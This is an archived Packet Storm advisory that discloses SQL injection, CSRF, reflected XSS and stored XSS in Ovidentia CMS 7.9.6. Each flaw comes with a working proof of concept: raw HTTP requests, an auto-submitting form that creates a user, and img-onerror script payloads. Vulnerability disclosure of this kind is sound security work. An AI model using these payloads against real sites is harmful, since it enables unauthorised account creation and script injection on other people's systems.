Ovidentia 7.9.6 CSRF / XSS / SQL Injection

2013-12-09T00:00:00
ID PACKETSTORM:124339
Type packetstorm
Reporter sajith
Modified 2013-12-09T00:00:00

Description

                                        
                                            `###########################################################  
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities  
[~] Author: sajith  
[~] version: Ovidentia 7.9.6  
[~]Vendor Homepage: http://www.ovidentia.org/  
[~] vulnerable app link:http://www.ovidentia.org/telecharger  
###########################################################  
  
[1]SQL injection vulnerability  
  
  
Log into admin panel and access delegate functionality > managing  
administrators where &id parameter (shown below link) is vulnerable to sql  
injection  
  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1  
  
POC by sajith shetty:  
  
request:  
  
GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101  
Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=  
  
response:  
  
style="cursor: pointer"  
onclick="s=document.getElementById('babParam_1_5_0');  
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div  
style="display: none; background-color: #EEEECC"  
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)  
<i>called at</i>  
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute  
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>  
<p><b>Database Error: You have an error in your SQL syntax; check the  
manual that corresponds to your MySQL server version for the right syntax  
to use near ''' at line 1</b></p>  
<p>This script cannot continue, terminating.  
  
  
  
[2]CSRF vulnerability  
  
log into the admin portal and access the create user functionality  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=  
using csrf vulnerability it was possible to add new user.  
  
<head>  
<title>POC by sajith shetty</title>  
</head>  
<body>  
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"  
enctype="multipart/form-data" method="post" id="formid">  
<input type="hidden" name="user[sendpwd]" value="0" />  
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />  
<input type="hidden" name="user[notifyuser]" value="0" />  
<input type="hidden" name="grp" value="" />  
<input type="hidden" name="idx" value="Create" />  
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />  
<input type="hidden" name="user[givenname]" value="POC" />  
<input type="hidden" name="pos" value="A" />  
<input type="hidden" name="widget_filepicker_job_uid[]"  
value="52a35b7fac6c9" />  
<input type="hidden" name="user[email]" value="poctester@xyz.com" />  
<input type="hidden" name="user[nickname]" value="1234" />  
<input type="hidden" name="user[sn]" value="test" />  
<input type="hidden" name="tg" value="users" />  
<input type="hidden" name="user[mn]" value="tester" />  
</form>  
<script>  
document.getElementById('formid').submit();  
</script>  
</body>  
</html>  
  
  
  
  
[3]Reflected XSS  
  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x  
onerror=prompt(1);>  
  
request:  
  
GET  
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101  
Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95  
  
  
response:  
  
<div id="ovidentia_headbottomright">  
<div>  
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :  
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->  
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x  
onerror=prompt(1);>" title="Home"><img  
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"  
/></a>   
<!-- Script OVML: show the list of the buttons of quick accesses to  
functions by leaning on entries available in user section -->  
  
  
  
[4]Stored xss  
  
log into the admin portal and access mail functionlity and create new  
domain using link below  
  
  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y  
  
here Name & Description field is vulnerable to stored XSS .payload:"><img  
src=x onerror=prompt(1);>  
  
  
  
request:  
  
  
POST /cms/ovidentia-7-9-6/index.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101  
Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer:  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y  
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 301  
  
tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen  
  
  
response:  
<td>Registrierte User</td>  
</tr>  
<tr class="BabSiteAdminFontBackground">  
<td>  
<a href="  
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img  
src=x onerror=prompt(111);></a>  
</td>  
<td>"><img src=x onerror=prompt(222);></td>  
<td>Registrierte User</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
<br>  
</div>  
  
`